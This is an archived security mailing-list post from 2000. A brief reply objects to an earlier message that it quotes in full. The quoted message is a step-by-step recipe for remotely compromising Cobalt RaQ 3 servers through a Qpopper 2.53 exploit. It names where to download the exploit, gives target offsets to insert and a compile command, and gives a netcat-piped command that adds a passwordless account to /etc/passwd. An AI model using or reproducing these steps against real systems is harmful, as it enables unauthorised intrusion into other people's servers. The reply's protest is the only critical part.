[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [cobalt-security] Qpopper - remote root...
- Subject: Re: [cobalt-security] Qpopper - remote root...
- From: "Frank Cubillos" <cubillos@xxxxxxxxxxxxxxxxxx>
- Date: Sat, 22 Jul 2000 16:42:55 -0500
- Organization: eDirect America
Why the heck would you publish that on an open list!
Geez Louise think about the lurkers in here!! Man, am I going ballistic for
no reason?
Group?
Frank
> Hi,
> If you want to exploit a Cobalt RaQ 3, grab the Qpopper 2.53 exploit from
> http://www.hack.co.za/daem0n/pop/pop3/7350qpop.c, add the following line
> to the "targets[]" structure:
> { "Cobalt OS 5.0: qpopper-2.53", 0xBFFFD368, 0xbfffdc18 },
> compile the exploit (gcc 7350qpop.c -o qpop-cobalt), and run it in the
> following fashion...:
> ./qpop-cobalt <target-id-you-made> foobar@xxxxxxxxxxx user@xxxxxxxxxxxxx
> echo owned::500:100:cracker:/:/bin/sh >>/etc/passwd 2>&1 >/dev/null | nc
> sendmail-server.com 25
> (user@xxxxxxxxxxxxx to, for example, gossi@xxxxxxxxxxxxxx, and
> sendmail-server.com to a mail server you can send through). You'll need
> netcat installed on the box you are testing from.
> That'll add a remote user (owned, no password) to the cobalt.
> The attack doesn't require an account on the system - it simply needs you
> to know an account on the system which 'pop3' is being used to retrieve
> the mail of - I'd imagine this is a majority of accounts on Cobalts.